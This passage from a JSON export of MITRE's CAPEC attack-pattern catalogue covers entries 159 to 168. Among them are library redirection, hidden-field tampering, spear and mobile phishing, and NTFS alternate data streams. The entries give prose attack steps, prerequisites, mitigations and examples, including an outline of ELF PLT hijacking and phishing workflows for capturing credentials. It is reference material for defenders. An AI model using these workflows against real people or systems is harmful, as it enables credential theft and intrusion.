practices."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"311"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1040","Entry_Name":"Network Sniffing"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations"}]}},"159":{"ID":"159","Name":"Redirect Access to Libraries","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application\'s attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"154","Exclude_Related":[{"Exclude_ID":"403"},{"Exclude_ID":"512"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"185"}]},"Prerequisites":{"Prerequisite":"The target must utilize external libraries and must fail to verify the integrity of these libraries before using them."},"Skills_Required":{"Skill":["To modify the entries in the configuration file pointing to malicious libraries",{"Level":"Low"},"To force symlink and timing issues for redirecting access to libraries",{"Level":"Medium"},"To reverse engineering the libraries and inject malicious code into the libraries",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: Restrict the permission to modify the entries in the configuration file.","Implementation: Check the integrity of the dynamically linked libraries before use them.","Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries."]},"Example_Instances":{"Example":"In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... \u2022 mark the text segment writeable \u2022 save the PLT(GOT) entry \u2022 replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... \u2022 do the payload of the new lib call \u2022 restore the original PLT(GOT) entry \u2022 call the lib call \u2022 save the PLT(GOT) entry again (if its changed) \u2022 replace the PLT(GOT) entry with the address of the new lib call"},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"706"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.008","Entry_Name":"Hijack Execution Flow:Path Interception by Search Order Hijacking"}},"References":{"Reference":[{"External_Reference_ID":"REF-29"},{"External_Reference_ID":"REF-30","Section":"OWASP Top 10 2007 A3 \u2013 Malicious File Execution"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"160":{"ID":"160","Name":"Exploit Script-Based APIs","Abstraction":"Standard","Status":"Draft","Description":"Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support <script> tags that allow scripting languages to be embedded in the page and then interpreted by the receiving web browser. If the content provider is malicious, these scripts can compromise the client application. Some applications may even execute the scripts under their own identity (rather than the identity of the user providing the script) which can allow attackers to perform activities that would otherwise be denied to them.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"113","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify API] Discover an API of interest by exploring application documentation or observing responses to API calls","Technique":"Search via internet for known, published APIs that support scripting instructions as arguments"},{"Step":"2","Phase":"Experiment","Description":"[Test simple script] Adversaries will attempt to give a smaller script as input to the API, such as simply printing to the console, to see if the attack is viable.","Technique":"Create a general script to be taken as input by the API"},{"Step":"3","Phase":"Exploit","Description":"[Give malicious scripting instructions to API] Adversaries will now craft custom scripts to do malicious behavior. Depending on the setup of the application this script could be run with user or admin level priveleges.","Technique":"Crafting a malicious script to be run on a system based on priveleges and capabilities of the system"}]},"Prerequisites":{"Prerequisite":["The target application must include the use of APIs that execute scripts.","The target application must allow the attacker to provide some or all of the arguments to one of these script interpretation methods and must fail to adequately filter these arguments for dangerous or unwanted script commands."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"346"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Programming to included script-based APIs",{"Date":"2015-12-07"}]}},"161":{"ID":"161","Name":"Infrastructure Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An attacker exploits characteristics of the infrastructure of a network entity in order to perpetrate attacks or information gathering on network objects or effect a change in the ordinary information flow between network objects. Most often, this involves manipulation of the routing of network messages so, instead of arriving at their proper destination, they are directed towards an entity of the attackers\' choosing, usually a server controlled by the attacker. The victim is often unaware that their messages are not being processed correctly. For example, a targeted client may believe they are connecting to their own bank but, in fact, be connecting to a Pharming site controlled by the attacker which then collects the user\'s login information in order to hijack the actual bank account.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"CanPrecede","CAPEC_ID":"664"}},"Prerequisites":{"Prerequisite":"The targeted client must access the site via infrastructure that the attacker has co-opted and must fail to adequately verify that the communication channel is operating correctly (e.g. by verifying that they are, in fact, connected to the site they intended.)"},"Resources_Required":{"Resource":"The attacker must be able to corrupt the infrastructure used by the client. For some variants of this attack, the attacker must be able to stand up their own services that mimic the services the targeted client intends to use."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"162":{"ID":"162","Name":"Manipulating Hidden Fields","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a weakness in the server\'s trust of client-side processing by modifying data on the client-side, such as price information, and then submitting this data to the server, which processes the modified data. For example, eShoplifting is a data manipulation attack against an on-line merchant during a purchasing transaction. The manipulation of price, discount or quantity fields in the transaction message allows the adversary to acquire items at a lower cost than the merchant intended. The adversary performs a normal purchasing transaction but edits hidden fields within the HTML form response that store price or other information to give themselves a better deal. The merchant then uses the modified pricing information in calculating the cost of the selected items.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"77"}},"Prerequisites":{"Prerequisite":["The targeted site must contain hidden fields to be modified.","The targeted site must not validate the hidden fields with backend processing."]},"Resources_Required":{"Resource":"The adversary must have the ability to modify hidden fields by editing the HTTP response to the server."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"602"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"}],"Previous_Entry_Name":["Manipulating hidden fields to change the normal flow of transactions (eShoplifting)",{"Date":"2015-12-07"}]}},"163":{"ID":"163","Name":"Spear Phishing","Abstraction":"Detailed","Status":"Draft","Description":"An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"98"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain useful contextual detailed information about the targeted user or organization] An adversary collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding.","Technique":["Conduct web searching research of target. See also: CAPEC-118.","Identify trusted associates, colleagues and friends of target. See also: CAPEC-118.","Utilize social engineering attack patterns such as Pretexting. See also: CAPEC-407.","Collect social information via dumpster diving. See also: CAPEC-406.","Collect social information via traditional sources. See also: CAPEC-118.","Collect social information via Non-traditional sources. See also: CAPEC-118."]},{"Step":"2","Phase":"Experiment","Description":"[Optional: Obtain domain name and certificate to spoof legitimate site] This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.","Technique":["Optionally obtain a domain name that visually looks similar to the legitimate site\'s domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L).","Optionally obtain a legitimate SSL certificate for the new domain name."]},{"Step":"3","Phase":"Experiment","Description":"[Optional: Explore legitimate website and create duplicate] An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.","Technique":["Use spidering software to get copy of web pages on legitimate site.","Manually save copies of required web pages from legitimate site.","Create new web pages that have the legitimate site\'s look at feel, but contain completely new content."]},{"Step":"4","Phase":"Experiment","Description":"[Optional: Build variants of the website with very specific user information e.g., living area, etc.] Once the adversary has their website which duplicates a legitimate website, they need to build very custom user related information in it. For example, they could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website.","Technique":"Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim."},{"Step":"5","Phase":"Exploit","Description":"[Convince user to enter sensitive information on adversary\'s site.] An adversary sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to adversary\'s website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.","Technique":["Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.","Place phishing link in post to online forum."]},{"Step":"6","Phase":"Exploit","Description":"[Use stolen credentials to log into legitimate site] Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim\'s login credentials to log into their bank account and transfer money to an account of their choice.","Technique":"Log in to the legitimate site using another user\'s supplied credentials."}]},"Prerequisites":{"Prerequisite":"None. Any user can be targeted by a Spear Phishing attack."},"Skills_Required":{"Skill":["Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc).",{"Level":"Medium"}]},"Resources_Required":{"Resource":"An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"Information Leakage"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges","Note":"Privilege Escalation"},{"Scope":"Integrity","Impact":"Modify Data","Note":"Data Modification"}]},"Mitigations":{"Mitigation":"Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind."},"Example_Instances":{"Example":["The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity that happened in a different area from where they live (details might be provided by the spear phishers) and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An adversary has just collected the target\'s online banking information which can now be used by them to log into the target\'s bank account and transfer money to a bank account of the adversary\'s choice.","An adversary can leverage a weakness in the SMB protocol by sending the target, an official looking e-mail from their employer\'s IT Department stating that their system has vulnerable software, which they need to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. Once the link is clicked, the target is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate the target to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a \\"Pass The Hash\\" attack."]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1534","Entry_Name":"Internal Spearfishing"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1566.001","Entry_Name":"Phishing:Spearfishing Attachment"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1566.002","Entry_Name":"Phishing:Spearfishing Link"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1566.003","Entry_Name":"Phishing:Spearfishing via Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"164":{"ID":"164","Name":"Mobile Phishing","Abstraction":"Detailed","Status":"Stable","Description":"An adversary targets mobile phone users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Mobile Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a text or SMS message, rather than email. The user is enticed to provide information or visit a compromised web site via this message. Apart from the manner in which the attack is initiated, the attack proceeds as a standard Phishing attack.","Alternate_Terms":{"Alternate_Term":[{"Term":"Smishing"},{"Term":"MobPhishing"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"98"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain domain name and certificate to spoof legitimate site] This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.","Technique":["Optionally obtain a domain name that visually looks similar to the legitimate site\'s domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)","Optionally obtain a legitimate SSL certificate for the new domain name."]},{"Step":"2","Phase":"Explore","Description":"[Explore legitimate website and create duplicate] An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.","Technique":["Use spidering software to get copy of web pages on legitimate site.","Manually save copies of required web pages from legitimate site.","Create new web pages that have the legitimate site\'s look and feel, but contain completely new content."]},{"Step":"3","Phase":"Exploit","Description":"[Convince user to enter sensitive information on adversary\'s site.] An adversary sends a text message to the victim that has a call-to-action, in order to persuade the user into clicking the included link (which then takes the victim to the adversary\'s website) and logging in. The key is to get the victim to believe that the text message originates from a legitimate entity with which the victim does business and that the website pointed to by the URL in the text message is the legitimate website. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.","Technique":"Send the user a message from a spoofed legitimate-looking mobile number that asks the user to click on the included link."},{"Step":"4","Phase":"Exploit","Description":"[Use stolen credentials to log into legitimate site] Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim\'s login credentials to log into their bank account and transfer money to an account of their choice.","Technique":"Log in to the legitimate site using another user\'s supplied credentials"}]},"Prerequisites":{"Prerequisite":["An adversary needs mobile phone numbers to initiate contact with the victim.","An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \\"hooks\\" to many potential victims.","An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.","The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity."]},"Skills_Required":{"Skill":["Basic knowledge about websites: obtaining them, designing and implementing them, etc.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Either mobile phone or access to a web resource that allows text messages to be sent to mobile phones. Resources needed for regular Phishing attack."},"Indicators":{"Indicator":["You receive a text message from an entity that you are not even a customer of prompting you to log into your account.","You receive any text message that provides you with a link that takes you to a website which requires you to enter your credentials."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":"Do not follow any links that you receive within text messages and do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. Safe practices also include leveraging the entity\'s mobile application or directly typing the entity\'s URL in the browser and only then logging in. Never reply to any text messages that ask you to provide sensitive information of any kind."},"Example_Instances":{"Example":"The target receives a text message stating that their Apple ID has been disabled due to suspicious activity and that they need to click on the link included in the message to log into their Apple account in order to enable it. The link in the text message looks legitimate and once the link is clicked, the login page is an exact replica of Apple\'s standard login page. The target supplies their login credentials and are then notified that their account has now been unlocked. However, the adversary has just collected the target\'s Apple account information, which can now be used by the adversary for a variety of purposes."},"References":{"Reference":[{"External_Reference_ID":"REF-590"},{"External_Reference_ID":"REF-591"},{"External_Reference_ID":"REF-592"},{"External_Reference_ID":"REF-593"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Alternate_Terms"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Skills_Required"}],"Previous_Entry_Name":["Mobile Phishing (aka MobPhishing)",{"Date":"2017-01-09"}]}},"165":{"ID":"165","Name":"File Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An attacker modifies file contents or attributes (such as extensions or names) of files in a manner to cause incorrect processing by an application. Attackers use this class of attacks to cause applications to enter unstable states, overwrite or expose sensitive information, and even execute arbitrary code with the application\'s privileges. This class of attacks differs from attacks on configuration information (even if file-based) in that file manipulation causes the file processing to result in non-standard behaviors, such as buffer overflows or use of the incorrect interpreter. Configuration attacks rely on the application interpreting files correctly in order to insert harmful configuration information. Likewise, resource location attacks rely on controlling an application\'s ability to locate files, whereas File Manipulation attacks do not require the application to look in a non-default location, although the two classes of attacks are often combined.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must use the affected file without verifying its integrity."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. In some cases, tools can be used to better control the response of the targeted application to the modified file."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"166":{"ID":"166","Name":"Force the System to Reset Values","Abstraction":"Standard","Status":"Draft","Description":"An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions. Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn\'t obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The targeted application must have a reset function that returns the configuration of the application to an earlier state.","The reset functionality must be inadequately protected against use."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. In some cases, the attacker may need special client applications in order to execute the reset functionality."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"306"},{"CWE_ID":"1221"},{"CWE_ID":"1232"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"167":{"ID":"167","Name":"White Box Reverse Engineering","Abstraction":"Standard","Status":"Draft","Description":"An attacker discovers the structure, function, and composition of a type of computer software through white box analysis techniques. White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"188"}},"Prerequisites":{"Prerequisite":"Direct access to the object or software."},"Resources_Required":{"Resource":"Reverse engineering of software requires varying tools and methods that enable the decompiling of executable or other compiled objects."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1323"},{"CWE_ID":"1324"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Lifting Sensitive Data from the Client",{"Date":"2015-11-09"}]}},"168":{"ID":"168","Name":"Windows ::DATA Alternate Data Stream","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple \\"files\\" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"636"}},"Prerequisites":{"Prerequisite":"The target must be running the Microsoft NTFS file system."},"Resources_Required":{"Resource":"The attacker must have command line or programmatic access to the target\'s files system with write/read permissions."},"Mitigations":{"Mitigation":["Design: Use FAT file systems which do not support Alternate Data Streams.","Implementation: Use Vista dir with the -R switch or utility to find Alternate Data Streams and take appropriate action with those discovered.","Implementation: Use products that are Alternate Data Stream aware for virus scanning and system security operations."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"212"},{"CWE_ID":"69"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Windows alternate data stream"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The 